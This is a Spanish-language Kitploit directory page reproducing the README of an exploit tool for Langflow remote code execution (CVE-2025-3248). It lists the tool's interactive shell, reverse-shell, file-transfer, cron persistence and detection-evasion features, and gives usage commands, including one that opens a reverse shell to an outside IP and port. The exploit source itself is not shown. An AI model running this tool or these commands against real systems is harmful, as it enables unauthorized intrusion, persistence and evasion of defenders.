Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
langflow-rce-exploit — Exploit de Ejecución Remota de Código para Langflow (CVE-2025-3248) - [ Por S4Tech ] | Kitploit
Herramientas/GitHubGitHub/0-d3y/langflow-rce-exploit
Escalada de PrivilegiosMecanismos de PersistenciaAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
7112hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub0-d3y/langflow-rce-exploit

langflow-rce-exploit

Exploit de Ejecución Remota de Código para Langflow (CVE-2025-3248) - [ Por S4Tech ]

Ver Repositorio

Exploit RCE de Langflow (CVE-2025-3248)

Python Version License Platform

Exploit de Ejecución Remota de Código para Langflow (CVE-2025-3248)

Características

  • Detección automática de vulnerabilidades
  • Múltiples modos de explotación:
    • Shell interactivo
    • Ejecución de un solo comando
    • Conexión reverse shell
  • Capacidad de subida de archivos
  • Interfaz de usuario coloreada
  • Múltiples métodos de reverse shell
  • Persistencia del historial de comandos

📌 Registro de cambios (v2.0)

✨ Nuevas características:

  • Sistema de payload avanzado con 5 métodos de ejecución
  • Subida/descarga de archivos con codificación Base64
  • Persistencia mediante tareas cron (comando persist)
  • Mejoras en la shell interactiva:
    • upload local_path remote_path
    • download remote_path local_path
    • comando clear para terminal

🛡️ Mejoras de seguridad:

  • Ofuscación automática del payload (Base64 + variantes aleatorias)
  • Rotación de cabeceras por solicitud:
    • User-Agent aleatorio
    • Direcciones IP X-Forwarded-For falsificadas
  • Omisión de HTTPS (soporte para certificados autofirmados)
  • Sin redirecciones para evitar detección

⚡ Mejoras técnicas:

  • Verificación de vulnerabilidad en múltiples etapas
  • Manejo de errores mejorado para conexiones inestables
  • Registro completo de sesión en exploit_log.txt
  • Persistencia del historial de comandos (.langflow_shell_history)

📊 Comparación de versiones:

Característicav1.0v2.0
Métodos de payload15
Transferencia de archivos❌ No soportada✅ Soportada
Persistencia❌✅
Nivel de sigiloBásicoAvanzado
Registro de sesión❌✅

🐛 Correcciones de errores:

  • Se corrigieron problemas de conexión HTTPS
  • Mejor manejo de caracteres especiales en comandos
  • Se estabilizó la fiabilidad de la reverse shell

Requisitos

  • Python 3.6 o superior
  • Librerías necesarias:
    • requests
    • colorama
    • readline

Instalación

git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt

Uso

python exploit.py <URL> [options]

Opciones disponibles:

OpciónDescripción
--shellInicia una shell interactiva
--reverse IP PORTLanza una reverse shell a la IP:PUERTO especificada
--command CMDEjecuta un solo comando
--verboseHabilita salida detallada
--timeout SECEstablece tiempo de espera de solicitud (predeterminado: 10s)

Ejemplos:

  1. Verificar vulnerabilidad:
python exploit.py http://target.com
  1. Iniciar shell interactiva:
python exploit.py http://target.com --shell
  1. Ejecutar un solo comando:
python exploit.py http://target.com --command "whoami"
  1. Lanzar reverse shell:
python exploit.py http://target.com --reverse 192.168.1.100 4444

Capturas de pantalla

Image.png)

Advertencia

âڑ ï¸ڈ Esta herramienta es solo para fines educativos y de pruebas autorizadas.
âڑ ï¸ڈ El uso no autorizado contra sistemas que no posees o para los que no tienes permiso de prueba es ilegal.

Licencia

Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para más detalles.

Autor

  • Mr.SaMi
    Twitter
    Instagram

Contribuciones

Las solicitudes de extracción son bienvenidas. Para cambios importantes, abra primero un issue para discutir lo que le gustaría cambiar.

Descargar herramienta